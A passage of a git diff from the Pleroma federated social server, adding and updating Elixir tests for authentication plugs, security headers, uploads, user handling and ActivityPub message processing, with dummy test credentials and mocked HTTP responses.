"wrong"}) -      conn_result = AuthenticationPlug.call(conn, %{}) +    ret_conn = +      conn +      |> AuthenticationPlug.call(%{}) -      assert conn == conn_result -    end +    assert conn == ret_conn    end  end diff --git a/test/plugs/basic_auth_decoder_plug_test.exs b/test/plugs/basic_auth_decoder_plug_test.exs new file mode 100644 index 000000000..a4876fef7 --- /dev/null +++ b/test/plugs/basic_auth_decoder_plug_test.exs @@ -0,0 +1,31 @@ +defmodule Pleroma.Plugs.BasicAuthDecoderPlugTest do +  use Pleroma.Web.ConnCase, async: true + +  alias Pleroma.Plugs.BasicAuthDecoderPlug + +  defp basic_auth_enc(username, password) do +    "Basic " <> Base.encode64("#{username}:#{password}") +  end + +  test "it puts the decoded credentials into the assigns", %{conn: conn} do +    header = basic_auth_enc("moonman", "iloverobek") + +    conn = +      conn +      |> put_req_header("authorization", header) +      |> BasicAuthDecoderPlug.call(%{}) + +    assert conn.assigns[:auth_credentials] == %{ +             username: "moonman", +             password: "iloverobek" +           } +  end + +  test "without a authorization header it doesn't do anything", %{conn: conn} do +    ret_conn = +      conn +      |> BasicAuthDecoderPlug.call(%{}) + +    assert conn == ret_conn +  end +end diff --git a/test/plugs/ensure_authenticated_plug_test.exs b/test/plugs/ensure_authenticated_plug_test.exs new file mode 100644 index 000000000..b32817fef --- /dev/null +++ b/test/plugs/ensure_authenticated_plug_test.exs @@ -0,0 +1,27 @@ +defmodule Pleroma.Plugs.EnsureAuthenticatedPlugTest do +  use Pleroma.Web.ConnCase, async: true + +  alias Pleroma.Plugs.EnsureAuthenticatedPlug +  alias Pleroma.User + +  test "it halts if no user is assigned", %{conn: conn} do +    conn = +      conn +      |> EnsureAuthenticatedPlug.call(%{}) + +    assert conn.status == 403 +    assert conn.halted == true +  end + +  test "it continues if a user is assigned", %{conn: conn} do +    conn = +      conn +      |> assign(:user, %User{}) + +    ret_conn = +      conn +      |> EnsureAuthenticatedPlug.call(%{}) + +    assert ret_conn == conn +  end +end diff --git a/test/plugs/ensure_user_key_plug_test.exs b/test/plugs/ensure_user_key_plug_test.exs new file mode 100644 index 000000000..9beda838e --- /dev/null +++ b/test/plugs/ensure_user_key_plug_test.exs @@ -0,0 +1,25 @@ +defmodule Pleroma.Plugs.EnsureUserKeyPlugTest do +  use Pleroma.Web.ConnCase, async: true + +  alias Pleroma.Plugs.EnsureUserKeyPlug + +  test "if the conn has a user key set, it does nothing", %{conn: conn} do +    conn = +      conn +      |> assign(:user, 1) + +    ret_conn = +      conn +      |> EnsureUserKeyPlug.call(%{}) + +    assert conn == ret_conn +  end + +  test "if the conn has no key set, it sets it to nil", %{conn: conn} do +    conn = +      conn +      |> EnsureUserKeyPlug.call(%{}) + +    assert Map.has_key?(conn.assigns, :user) +  end +end diff --git a/test/plugs/http_security_plug_test.exs b/test/plugs/http_security_plug_test.exs new file mode 100644 index 000000000..169c3b3a8 --- /dev/null +++ b/test/plugs/http_security_plug_test.exs @@ -0,0 +1,79 @@ +defmodule Pleroma.Web.Plugs.HTTPSecurityPlugTest do +  use Pleroma.Web.ConnCase +  alias Pleroma.Config +  alias Plug.Conn + +  test "it sends CSP headers when enabled", %{conn: conn} do +    Config.put([:http_security, :enabled], true) + +    conn = +      conn +      |> get("/api/v1/instance") + +    refute Conn.get_resp_header(conn, "x-xss-protection") == [] +    refute Conn.get_resp_header(conn, "x-permitted-cross-domain-policies") == [] +    refute Conn.get_resp_header(conn, "x-frame-options") == [] +    refute Conn.get_resp_header(conn, "x-content-type-options") == [] +    refute Conn.get_resp_header(conn, "x-download-options") == [] +    refute Conn.get_resp_header(conn, "referrer-policy") == [] +    refute Conn.get_resp_header(conn, "content-security-policy") == [] +  end + +  test "it does not send CSP headers when disabled", %{conn: conn} do +    Config.put([:http_security, :enabled], false) + +    conn = +      conn +      |> get("/api/v1/instance") + +    assert Conn.get_resp_header(conn, "x-xss-protection") == [] +    assert Conn.get_resp_header(conn, "x-permitted-cross-domain-policies") == [] +    assert Conn.get_resp_header(conn, "x-frame-options") == [] +    assert Conn.get_resp_header(conn, "x-content-type-options") == [] +    assert Conn.get_resp_header(conn, "x-download-options") == [] +    assert Conn.get_resp_header(conn, "referrer-policy") == [] +    assert Conn.get_resp_header(conn, "content-security-policy") == [] +  end + +  test "it sends STS headers when enabled", %{conn: conn} do +    Config.put([:http_security, :enabled], true) +    Config.put([:http_security, :sts], true) + +    conn = +      conn +      |> get("/api/v1/instance") + +    refute Conn.get_resp_header(conn, "strict-transport-security") == [] +    refute Conn.get_resp_header(conn, "expect-ct") == [] +  end + +  test "it does not send STS headers when disabled", %{conn: conn} do +    Config.put([:http_security, :enabled], true) +    Config.put([:http_security, :sts], false) + +    conn = +      conn +      |> get("/api/v1/instance") + +    assert Conn.get_resp_header(conn, "strict-transport-security") == [] +    assert Conn.get_resp_header(conn, "expect-ct") == [] +  end + +  test "referrer-policy header reflects configured value", %{conn: conn} do +    Config.put([:http_security, :enabled], true) + +    conn = +      conn +      |> get("/api/v1/instance") + +    assert Conn.get_resp_header(conn, "referrer-policy") == ["same-origin"] + +    Config.put([:http_security, :referrer_policy], "no-referrer") + +    conn = +      build_conn() +      |> get("/api/v1/instance") + +    assert Conn.get_resp_header(conn, "referrer-policy") == ["no-referrer"] +  end +end diff --git a/test/plugs/legacy_authentication_plug_test.exs b/test/plugs/legacy_authentication_plug_test.exs new file mode 100644 index 000000000..383a22ff8 --- /dev/null +++ b/test/plugs/legacy_authentication_plug_test.exs @@ -0,0 +1,82 @@ +defmodule Pleroma.Plugs.LegacyAuthenticationPlugTest do +  use Pleroma.Web.ConnCase, async: true + +  alias Pleroma.Plugs.LegacyAuthenticationPlug +  alias Pleroma.User + +  import Mock + +  setup do +    # password is "password" +    user = %User{ +      id: 1, +      name: "dude", +      password_hash: +        "$6$9psBWV8gxkGOZWBz$PmfCycChoxeJ3GgGzwvhlgacb9mUoZ.KUXNCssekER4SJ7bOK53uXrHNb2e4i8yPFgSKyzaW9CcmrDXWIEMtD1" +    } + +    %{user: user} +  end + +  test "it does nothing if a user is assigned", %{conn: conn, user: user} do +    conn = +      conn +      |> assign(:auth_credentials, %{username: "dude", password: "password"}) +      |> assign(:auth_user, user) +      |> assign(:user, %User{}) + +    ret_conn = +      conn +      |> LegacyAuthenticationPlug.call(%{}) + +    assert ret_conn == conn +  end + +  test "it authenticates the auth_user if present and password is correct and resets the password", +       %{ +         conn: conn, +         user: user +       } do +    conn = +      conn +      |> assign(:auth_credentials, %{username: "dude", password: "password"}) +      |> assign(:auth_user, user) + +    conn = +      with_mock User, +        reset_password: fn user, %{password: password, password_confirmation: password} -> +          send(self(), :reset_password) +          {:ok, user} +        end do +        conn +        |> LegacyAuthenticationPlug.call(%{}) +      end + +    assert_received :reset_password +    assert conn.assigns.user == user +  end + +  test "it does nothing if the password is wrong", %{ +    conn: conn, +    user: user +  } do +    conn = +      conn +      |> assign(:auth_credentials, %{username: "dude", password: "wrong_password"}) +      |> assign(:auth_user, user) + +    ret_conn = +      conn +      |> LegacyAuthenticationPlug.call(%{}) + +    assert conn == ret_conn +  end + +  test "with no credentials or user it does nothing", %{conn: conn} do +    ret_conn = +      conn +      |> LegacyAuthenticationPlug.call(%{}) + +    assert ret_conn == conn +  end +end diff --git a/test/plugs/session_authentication_plug_test.exs b/test/plugs/session_authentication_plug_test.exs new file mode 100644 index 000000000..bb51bc0db --- /dev/null +++ b/test/plugs/session_authentication_plug_test.exs @@ -0,0 +1,59 @@ +defmodule Pleroma.Plugs.SessionAuthenticationPlugTest do +  use Pleroma.Web.ConnCase, async: true + +  alias Pleroma.Plugs.SessionAuthenticationPlug +  alias Pleroma.User + +  setup %{conn: conn} do +    session_opts = [ +      store: :cookie, +      key: "_test", +      signing_salt: "cooldude" +    ] + +    conn = +      conn +      |> Plug.Session.call(Plug.Session.init(session_opts)) +      |> fetch_session +      |> assign(:auth_user, %User{id: 1}) + +    %{conn: conn} +  end + +  test "it does nothing if a user is assigned", %{conn: conn} do +    conn = +      conn +      |> assign(:user, %User{}) + +    ret_conn = +      conn +      |> SessionAuthenticationPlug.call(%{}) + +    assert ret_conn == conn +  end + +  test "if the auth_user has the same id as the user_id in the session, it assigns the user", %{ +    conn: conn +  } do +    conn = +      conn +      |> put_session(:user_id, conn.assigns.auth_user.id) +      |> SessionAuthenticationPlug.call(%{}) + +    assert conn.assigns.user == conn.assigns.auth_user +  end + +  test "if the auth_user has a different id as the user_id in the session, it does nothing", %{ +    conn: conn +  } do +    conn = +      conn +      |> put_session(:user_id, -1) + +    ret_conn = +      conn +      |> SessionAuthenticationPlug.call(%{}) + +    assert ret_conn == conn +  end +end diff --git a/test/plugs/set_user_session_id_plug_test.exs b/test/plugs/set_user_session_id_plug_test.exs new file mode 100644 index 000000000..5edc0dab8 --- /dev/null +++ b/test/plugs/set_user_session_id_plug_test.exs @@ -0,0 +1,39 @@ +defmodule Pleroma.Plugs.SetUserSessionIdPlugTest do +  use Pleroma.Web.ConnCase, async: true + +  alias Pleroma.Plugs.SetUserSessionIdPlug +  alias Pleroma.User + +  setup %{conn: conn} do +    session_opts = [ +      store: :cookie, +      key: "_test", +      signing_salt: "cooldude" +    ] + +    conn = +      conn +      |> Plug.Session.call(Plug.Session.init(session_opts)) +      |> fetch_session + +    %{conn: conn} +  end + +  test "doesn't do anything if the user isn't set", %{conn: conn} do +    ret_conn = +      conn +      |> SetUserSessionIdPlug.call(%{}) + +    assert ret_conn == conn +  end + +  test "sets the user_id in the session to the user id of the user assign", %{conn: conn} do +    conn = +      conn +      |> assign(:user, %User{id: 1}) +      |> SetUserSessionIdPlug.call(%{}) + +    id = get_session(conn, :user_id) +    assert id == 1 +  end +end diff --git a/test/plugs/user_enabled_plug_test.exs b/test/plugs/user_enabled_plug_test.exs new file mode 100644 index 000000000..ee4f72ccf --- /dev/null +++ b/test/plugs/user_enabled_plug_test.exs @@ -0,0 +1,39 @@ +defmodule Pleroma.Plugs.UserEnabledPlugTest do +  use Pleroma.Web.ConnCase, async: true + +  alias Pleroma.Plugs.UserEnabledPlug +  import Pleroma.Factory + +  test "doesn't do anything if the user isn't set", %{conn: conn} do +    ret_conn = +      conn +      |> UserEnabledPlug.call(%{}) + +    assert ret_conn == conn +  end + +  test "with a user that is deactivated, it removes that user", %{conn: conn} do +    user = insert(:user, info: %{"deactivated" => true}) + +    conn = +      conn +      |> assign(:user, user) +      |> UserEnabledPlug.call(%{}) + +    assert conn.assigns.user == nil +  end + +  test "with a user that is not deactivated, it does nothing", %{conn: conn} do +    user = insert(:user) + +    conn = +      conn +      |> assign(:user, user) + +    ret_conn = +      conn +      |> UserEnabledPlug.call(%{}) + +    assert conn == ret_conn +  end +end diff --git a/test/plugs/user_fetcher_plug_test.exs b/test/plugs/user_fetcher_plug_test.exs new file mode 100644 index 000000000..5195a0c4a --- /dev/null +++ b/test/plugs/user_fetcher_plug_test.exs @@ -0,0 +1,37 @@ +defmodule Pleroma.Plugs.UserFetcherPlugTest do +  use Pleroma.Web.ConnCase, async: true + +  alias Pleroma.Plugs.UserFetcherPlug +  import Pleroma.Factory + +  setup do +    user = insert(:user) +    %{user: user} +  end + +  test "if an auth_credentials assign is present, it tries to fetch the user and assigns it", %{ +    conn: conn, +    user: user +  } do +    conn = +      conn +      |> assign(:auth_credentials, %{ +        username: user.nickname, +        password: nil +      }) + +    conn = +      conn +      |> UserFetcherPlug.call(%{}) + +    assert conn.assigns[:auth_user] == user +  end + +  test "without a credential assign it doesn't do anything", %{conn: conn} do +    ret_conn = +      conn +      |> UserFetcherPlug.call(%{}) + +    assert conn == ret_conn +  end +end diff --git a/test/plugs/user_is_admin_plug_test.exs b/test/plugs/user_is_admin_plug_test.exs new file mode 100644 index 000000000..ddf9eb139 --- /dev/null +++ b/test/plugs/user_is_admin_plug_test.exs @@ -0,0 +1,39 @@ +defmodule Pleroma.Plugs.UserIsAdminPlugTest do +  use Pleroma.Web.ConnCase, async: true + +  alias Pleroma.Plugs.UserIsAdminPlug +  import Pleroma.Factory + +  test "accepts a user that is admin", %{conn: conn} do +    user = insert(:user, info: %{"is_admin" => true}) + +    conn = +      build_conn() +      |> assign(:user, user) + +    ret_conn = +      conn +      |> UserIsAdminPlug.call(%{}) + +    assert conn == ret_conn +  end + +  test "denies a user that isn't admin", %{conn: conn} do +    user = insert(:user) + +    conn = +      build_conn() +      |> assign(:user, user) +      |> UserIsAdminPlug.call(%{}) + +    assert conn.status == 403 +  end + +  test "denies when a user isn't set", %{conn: conn} do +    conn = +      build_conn() +      |> UserIsAdminPlug.call(%{}) + +    assert conn.status == 403 +  end +end diff --git a/test/support/httpoison_mock.ex b/test/support/httpoison_mock.ex index 4ee2feb95..e7344500f 100644 --- a/test/support/httpoison_mock.ex +++ b/test/support/httpoison_mock.ex @@ -1,8 +1,79 @@  defmodule HTTPoisonMock do    alias HTTPoison.Response +  def process_request_options(options), do: options +    def get(url, body \\ [], headers \\ []) +  def get("https://prismo.news/@mxb", _, _) do +    {:ok, +     %Response{ +       status_code: 200, +       body: File.read!("test/fixtures/httpoison_mock/https___prismo.news__mxb.json") +     }} +  end + +  def get("https://osada.macgirvin.com/channel/mike", _, _) do +    {:ok, +     %Response{ +       status_code: 200, +       body: +         File.read!("test/fixtures/httpoison_mock/https___osada.macgirvin.com_channel_mike.json") +     }} +  end + +  def get( +        "https://osada.macgirvin.com/.well-known/webfinger?resource=acct:mike@osada.macgirvin.com", +        _, +        _ +      ) do +    {:ok, +     %Response{ +       status_code: 200, +       body: File.read!("test/fixtures/httpoison_mock/mike@osada.macgirvin.com.json") +     }} +  end + +  def get("https://info.pleroma.site/activity.json", _, _) do +    {:ok, +     %Response{ +       status_code: 200, +       body: File.read!("test/fixtures/httpoison_mock/https__info.pleroma.site_activity.json") +     }} +  end + +  def get("https://info.pleroma.site/activity2.json", _, _) do +    {:ok, +     %Response{ +       status_code: 200, +       body: File.read!("test/fixtures/httpoison_mock/https__info.pleroma.site_activity2.json") +     }} +  end + +  def get("https://info.pleroma.site/activity3.json", _, _) do +    {:ok, +     %Response{ +       status_code: 200, +       body: File.read!("test/fixtures/httpoison_mock/https__info.pleroma.site_activity3.json") +     }} +  end + +  def get("https://info.pleroma.site/activity4.json", _, _) do +    {:ok, +     %Response{ +       status_code: 200, +       body: File.read!("test/fixtures/httpoison_mock/https__info.pleroma.site_activity4.json") +     }} +  end + +  def get("https://info.pleroma.site/actor.json", _, _) do +    {:ok, +     %Response{ +       status_code: 200, +       body: File.read!("test/fixtures/httpoison_mock/https___info.pleroma.site_actor.json") +     }} +  end +    def get("https://puckipedia.com/", [Accept: "application/activity+json"], _) do      {:ok,       %Response{ @@ -396,6 +467,17 @@ defmodule HTTPoisonMock do       }}    end +  def get("http://mastodon.example.org/users/admin/statuses/100787282858396771", _, _) do +    {:ok, +     %Response{ +       status_code: 200, +       body: +         File.read!( +           "test/fixtures/httpoison_mock/http___mastodon.example.org_users_admin_status_1234.json" +         ) +     }} +  end +    def get(          "https://pawoo.net/.well-known/webfinger",          [Accept: "application/xrd+xml,application/jrd+json"], @@ -684,6 +766,14 @@ defmodule HTTPoisonMock do       }}    end +  def get("https://n1u.moe/users/rye", [Accept: "application/activity+json"], _) do +    {:ok, +     %Response{ +       status_code: 200, +       body: File.read!("test/fixtures/httpoison_mock/rye.json") +     }} +  end +    def get(          "https://mst3k.interlinked.me/users/luciferMysticus",          [Accept: "application/activity+json"], diff --git a/test/upload_test.exs b/test/upload_test.exs index d273ea5f6..b2ce755d2 100644 --- a/test/upload_test.exs +++ b/test/upload_test.exs @@ -2,7 +2,58 @@ defmodule Pleroma.UploadTest do    alias Pleroma.Upload    use Pleroma.DataCase -  describe "Storing a file" do +  describe "Storing a file with the Local uploader" do +    setup do +      uploader = Pleroma.Config.get([Pleroma.Upload, :uploader]) +      filters = Pleroma.Config.get([Pleroma.Upload, :filters]) + +      unless uploader == Pleroma.Uploaders.Local || filters != [] do +        Pleroma.Config.put([Pleroma.Upload, :uploader], Pleroma.Uploaders.Local) +        Pleroma.Config.put([Pleroma.Upload, :filters], []) + +        on_exit(fn -> +          Pleroma.Config.put([Pleroma.Upload, :uploader], uploader) +          Pleroma.Config.put([Pleroma.Upload, :filters], filters) +        end) +      end + +      :ok +    end + +    test "returns a media url" do +      File.cp!("test/fixtures/image.jpg", "test/fixtures/image_tmp.jpg") + +      file = %Plug.Upload{ +        content_type: "image/jpg", +        path: Path.absname("test/fixtures/image_tmp.jpg"), +        filename: "image.jpg" +      } + +      {:ok, data} = Upload.store(file) + +      assert %{"url" => [%{"href" => url}]} = data + +      assert String.starts_with?(url, Pleroma.Web.base_url() <> "/media/") +    end + +    test "returns a media url with configured base_url" do +      base_url = "https://cache.pleroma.social" + +      File.cp!("test/fixtures/image.jpg", "test/fixtures/image_tmp.jpg") + +      file = %Plug.Upload{ +        content_type: "image/jpg", +        path: Path.absname("test/fixtures/image_tmp.jpg"), +        filename: "image.jpg" +      } + +      {:ok, data} = Upload.store(file, base_url: base_url) + +      assert %{"url" => [%{"href" => url}]} = data + +      assert String.starts_with?(url, base_url <> "/media/") +    end +      test "copies the file to the configured folder with deduping" do        File.cp!("test/fixtures/image.jpg", "test/fixtures/image_tmp.jpg") @@ -12,10 +63,11 @@ defmodule Pleroma.UploadTest do          filename: "an [image.jpg"        } -      data = Upload.store(file, true) +      {:ok, data} = Upload.store(file, filters: [Pleroma.Upload.Filter.Dedupe]) -      assert data["name"] == -               "e7a6d0cf595bff76f14c9a98b6c199539559e8b844e02e51e5efcfd1f614a2df.jpeg" +      assert List.first(data["url"])["href"] == +               Pleroma.Web.base_url() <> +                 "/media/e7a6d0cf595bff76f14c9a98b6c199539559e8b844e02e51e5efcfd1f614a2df.jpg"      end      test "copies the file to the configured folder without deduping" do @@ -27,7 +79,7 @@ defmodule Pleroma.UploadTest do          filename: "an [image.jpg"        } -      data = Upload.store(file, false) +      {:ok, data} = Upload.store(file)        assert data["name"] == "an [image.jpg"      end @@ -40,7 +92,7 @@ defmodule Pleroma.UploadTest do          filename: "an [image.jpg"        } -      data = Upload.store(file, true) +      {:ok, data} = Upload.store(file, filters: [Pleroma.Upload.Filter.Dedupe])        assert hd(data["url"])["mediaType"] == "image/jpeg"      end @@ -53,7 +105,7 @@ defmodule Pleroma.UploadTest do          filename: "an [image"        } -      data = Upload.store(file, false) +      {:ok, data} = Upload.store(file)        assert data["name"] == "an [image.jpg"      end @@ -66,7 +118,7 @@ defmodule Pleroma.UploadTest do          filename: "an [image.blah"        } -      data = Upload.store(file, false) +      {:ok, data} = Upload.store(file)        assert data["name"] == "an [image.jpg"      end @@ -79,8 +131,22 @@ defmodule Pleroma.UploadTest do          filename: "test.txt"        } -      data = Upload.store(file, false) +      {:ok, data} = Upload.store(file)        assert data["name"] == "test.txt"      end + +    test "copies the file to the configured folder with anonymizing filename" do +      File.cp!("test/fixtures/image.jpg", "test/fixtures/image_tmp.jpg") + +      file = %Plug.Upload{ +        content_type: "image/jpg", +        path: Path.absname("test/fixtures/image_tmp.jpg"), +        filename: "an [image.jpg" +      } + +      {:ok, data} = Upload.store(file, filters: [Pleroma.Upload.Filter.AnonymizeFilename]) + +      refute data["name"] == "an [image.jpg" +    end    end  end diff --git a/test/user_test.exs b/test/user_test.exs index 352a16687..231f1d94d 100644 --- a/test/user_test.exs +++ b/test/user_test.exs @@ -55,6 +55,15 @@ defmodule Pleroma.UserTest do      {:error, _} = User.follow(blockee, blocker)    end +  test "local users do not automatically follow local locked accounts" do +    follower = insert(:user, info: %{"locked" => true}) +    followed = insert(:user, info: %{"locked" => true}) + +    {:ok, follower} = User.maybe_direct_follow(follower, followed) + +    refute User.following?(follower, followed) +  end +    # This is a somewhat useless test.    # test "following a remote user will ensure a websub subscription is present" do    #   user = insert(:user) @@ -166,6 +175,25 @@ defmodule Pleroma.UserTest do        fetched_user = User.get_or_fetch_by_nickname("nonexistant")        assert fetched_user == nil      end + +    test "updates an existing user, if stale" do +      a_week_ago = NaiveDateTime.add(NaiveDateTime.utc_now(), -604_800) + +      orig_user = +        insert( +          :user, +          local: false, +          nickname: "admin@mastodon.example.org", +          ap_id: "http://mastodon.example.org/users/admin", +          last_refreshed_at: a_week_ago +        ) + +      assert orig_user.last_refreshed_at == a_week_ago + +      user = User.get_or_fetch_by_ap_id("http://mastodon.example.org/users/admin") + +      refute user.last_refreshed_at == orig_user.last_refreshed_at +    end    end    test "returns an ap_id for a user" do @@ -220,7 +248,7 @@ defmodule Pleroma.UserTest do      end      test "it has required fields" do -      [:name, :nickname, :ap_id] +      [:name, :ap_id]        |> Enum.each(fn field ->          cs = User.remote_user_creation(Map.delete(@valid_remote, field))          refute cs.valid? @@ -459,11 +487,13 @@ defmodule Pleroma.UserTest do      assert addressed in recipients    end -  test ".deactivate deactivates a user" do +  test ".deactivate can de-activate then re-activate a user" do      user = insert(:user)      assert false == !!user.info["deactivated"]      {:ok, user} = User.deactivate(user)      assert true == user.info["deactivated"] +    {:ok, user} = User.deactivate(user, false) +    assert false == !!user.info["deactivated"]    end    test ".delete deactivates a user, all follow relationships and all create activities" do @@ -481,7 +511,7 @@ defmodule Pleroma.UserTest do      {:ok, _, _} = CommonAPI.favorite(activity.id, follower)      {:ok, _, _} = CommonAPI.repeat(activity.id, follower) -    :ok = User.delete(user) +    {:ok, _} = User.delete(user)      followed = Repo.get(User, followed.id)      follower = Repo.get(User, follower.id) @@ -507,4 +537,57 @@ defmodule Pleroma.UserTest do      assert {:ok, %User{}} = User.insert_or_update_user(data)    end + +  describe "per-user rich-text filtering" do +    test "html_filter_policy returns nil when rich-text is enabled" do +      user = insert(:user) + +      assert nil == User.html_filter_policy(user) +    end + +    test "html_filter_policy returns TwitterText scrubber when rich-text is disabled" do +      user = insert(:user, %{info: %{"no_rich_text" => true}}) + +      assert Pleroma.HTML.Scrubber.TwitterText == User.html_filter_policy(user) +    end +  end + +  describe "caching" do +    test "invalidate_cache works" do +      user = insert(:user) +      user_info = User.get_cached_user_info(user) + +      User.invalidate_cache(user) + +      {:ok, nil} = Cachex.get(:user_cache, "ap_id:#{user.ap_id}") +      {:ok, nil} = Cachex.get(:user_cache, "nickname:#{user.nickname}") +      {:ok, nil} = Cachex.get(:user_cache, "user_info:#{user.id}") +    end + +    test "User.delete() plugs any possible zombie objects" do +      user = insert(:user) + +      {:ok, _} = User.delete(user) + +      {:ok, cached_user} = Cachex.get(:user_cache, "ap_id:#{user.ap_id}") + +      assert cached_user != user + +      {:ok, cached_user} = Cachex.get(:user_cache, "nickname:#{user.ap_id}") + +      assert cached_user != user +    end +  end + +  describe "User.search" do +    test "finds a user, ranking by similarity" do +      user = insert(:user, %{name: "lain"}) +      user_two = insert(:user, %{name: "ean"}) +      user_three = insert(:user, %{name: "ebn", nickname: "lain@mastodon.social"}) +      user_four = insert(:user, %{nickname: "lain@pleroma.soykaf.com"}) + +      assert user_four == +               User.search("lain@ple") |> List.first() |> Map.put(:search_distance, nil) +    end +  end  end diff --git a/test/web/activity_pub/activity_pub_controller_test.exs b/test/web/activity_pub/activity_pub_controller_test.exs index 3ed7be402..1c24b348c 100644 --- a/test/web/activity_pub/activity_pub_controller_test.exs +++ b/test/web/activity_pub/activity_pub_controller_test.exs @@ -5,6 +5,28 @@ defmodule Pleroma.Web.ActivityPub.ActivityPubControllerTest do    alias Pleroma.{Repo, User}    alias Pleroma.Activity +  describe "/relay" do +    test "with the relay active, it returns the relay user", %{conn: conn} do +      res = +        conn +        |> get(activity_pub_path(conn, :relay)) +        |> json_response(200) + +      assert res["id"] =~ "/relay" +    end + +    test "with the relay disabled, it returns 404", %{conn: conn} do +      Pleroma.Config.put([:instance, :allow_relay], false) + +      res = +        conn +        |> get(activity_pub_path(conn, :relay)) +        |> json_response(404) + +      Pleroma.Config.put([:instance, :allow_relay], true) +    end +  end +    describe "/users/:nickname" do      test "it returns a json representation of the user", %{conn: conn} do        user = insert(:user) @@ -46,7 +68,7 @@ defmodule Pleroma.Web.ActivityPub.ActivityPubControllerTest do      end    end -  describe "/users/:nickname/inbox" do +  describe "/inbox" do      test "it inserts an incoming activity into the database", %{conn: conn} do        data = File.read!("test/fixtures/mastodon-post-activity.json") |> Poison.decode!() @@ -62,6 +84,27 @@ defmodule Pleroma.Web.ActivityPub.ActivityPubControllerTest do      end    end +  describe "/users/:nickname/inbox" do +    test "it inserts an incoming activity into the database", %{conn: conn} do +      user = insert(:user) + +      data = +        File.read!("test/fixtures/mastodon-post-activity.json") +        |> Poison.decode!() +        |> Map.put("bcc", [user.ap_id]) + +      conn = +        conn +        |> assign(:valid_signature, true) +        |> put_req_header("content-type", "application/activity+json") +        |> post("/users/#{user.nickname}/inbox", data) + +      assert "ok" == json_response(conn, 200) +      :timer.sleep(500) +      assert Activity.get_by_ap_id(data["id"]) +    end +  end +    describe "/users/:nickname/outbox" do      test "it returns a note activity in a collection", %{conn: conn} do        note_activity = insert(:note_activity) diff --git a/test/web/activity_pub/activity_pub_test.exs b/test/web/activity_pub/activity_pub_test.exs index 1cf7d6bbc..35c381ac3 100644 --- a/test/web/activity_pub/activity_pub_test.exs +++ b/test/web/activity_pub/activity_pub_test.exs @@ -476,6 +476,54 @@ defmodule Pleroma.Web.ActivityPub.ActivityPubTest do      end    end +  describe "timeline post-processing" do +    test "it filters broken threads" do +      user1 = insert(:user) +      user2 = insert(:user) +      user3 = insert(:user) + +      {:ok, user1} = User.follow(user1, user3) +      assert User.following?(user1, user3) + +      {:ok, user2} = User.follow(user2, user3) +      assert User.following?(user2, user3) + +      {:ok, user3} = User.follow(user3, user2) +      assert User.following?(user3, user2) + +      {:ok, public_activity} = CommonAPI.post(user3, %{"status" => "hi 1"}) + +      {:ok, private_activity_1} = +        CommonAPI.post(user3, %{"status" => "hi 2", "visibility" => "private"}) + +      {:ok, private_activity_2} = +        CommonAPI.post(user2, %{ +          "status" => "hi 3", +          "visibility" => "private", +          "in_reply_to_status_id" => private_activity_1.id +        }) + +      {:ok, private_activity_3} = +        CommonAPI.post(user3, %{ +          "status" => "hi 4", +          "visibility" => "private", +          "in_reply_to_status_id" => private_activity_2.id +        }) + +      assert user1.following == [user3.ap_id <> "/followers", user1.ap_id] + +      activities = ActivityPub.fetch_activities([user1.ap_id | user1.following]) + +      assert [public_activity, private_activity_1, private_activity_3] == activities +      assert length(activities) == 3 + +      activities = ActivityPub.contain_timeline(activities, user1) + +      assert [public_activity, private_activity_1] == activities +      assert length(activities) == 2 +    end +  end +    test "it can fetch plume articles" do      {:ok, object} =        ActivityPub.fetch_object_from_id( diff --git a/test/web/activity_pub/relay_test.exs b/test/web/activity_pub/relay_test.exs new file mode 100644 index 000000000..41d13e055 --- /dev/null +++ b/test/web/activity_pub/relay_test.exs @@ -0,0 +1,11 @@ +defmodule Pleroma.Web.ActivityPub.RelayTest do +  use Pleroma.DataCase + +  alias Pleroma.Web.ActivityPub.Relay + +  test "gets an actor for the relay" do +    user = Relay.get_actor() + +    assert user.ap_id =~ "/relay" +  end +end diff --git a/test/web/activity_pub/transmogrifier_test.exs b/test/web/activity_pub/transmogrifier_test.exs index e2926d495..829da0a65 100644 --- a/test/web/activity_pub/transmogrifier_test.exs +++ b/test/web/activity_pub/transmogrifier_test.exs @@ -121,6 +121,38 @@ defmodule Pleroma.Web.ActivityPub.TransmogrifierTest do                 "<p>henlo from my Psion netBook</p><p>message sent from my Psion netBook</p>"      end +    test "it works for incoming announces with actor being inlined (kroeg)" do +      data = File.read!("test/fixtures/kroeg-announce-with-inline-actor.json") |> Poison.decode!() + +      {:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data) + +      assert data["actor"] == "https://puckipedia.com/" +    end + +    test "it works for incoming notices with tag not being an array (kroeg)" do +      data = File.read!("test/fixtures/kroeg-array-less-emoji.json") |> Poison.decode!() + +      {:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data) + +      assert data["object"]["emoji"] == %{ +               "icon_e_smile" => "https://puckipedia.com/forum/images/smilies/icon_e_smile.png" +             } + +      data = File.read!("test/fixtures/kroeg-array-less-hashtag.json") |> Poison.decode!() + +      {:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data) + +      assert "test" in data["object"]["tag"] +    end + +    test "it works for incoming notices with url not being a string (prismo)" do +      data = File.read!("test/fixtures/prismo-url-map.json") |> Poison.decode!() + +      {:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data) + +      assert data["object"]["url"] == "https://prismo.news/posts/83" +    end +      test "it works for incoming follow requests" do        user = insert(:user) @@ -329,6 +361,26 @@ defmodule Pleroma.Web.ActivityPub.TransmogrifierTest do        refute Repo.get(Activity, activity.id)      end +    test "it fails for incoming deletes with spoofed origin" do +      activity = insert(:note_activity) + +      data = +        File.read!("test/fixtures/mastodon-delete.json") +        |> Poison.decode!() + +      object = +        data["object"] +        |> Map.put("id", activity.data["object"]["id"]) + +      data = +        data +        |> Map.put("object", object) + +      :error = Transmogrifier.handle_incoming(data) + +      assert Repo.get(Activity, activity.id) +    end +      test "it works for incoming unannounces with an existing notice" do        user = insert(:user)        {:ok, activity} = CommonAPI.post(user, %{"status" => "hey"}) @@ -671,7 +723,9 @@ defmodule Pleroma.Web.ActivityPub.TransmogrifierTest do        {:ok, activity} = CommonAPI.post(user, %{"status" => "hey"})        {:ok, modified} = Transmogrifier.prepare_outgoing(activity.data) -      assert modified["@context"] == "https://www.w3.org/ns/activitystreams" +      assert modified["@context"] == +               Pleroma.Web.ActivityPub.Utils.make_json_ld_header()["@context"] +        assert modified["object"]["conversation"] == modified["context"]      end @@ -709,6 +763,39 @@ defmodule Pleroma.Web.ActivityPub.TransmogrifierTest do        assert modified["object"]["inReplyTo"] == "http://gs.example.org:4040/index.php/notice/29" 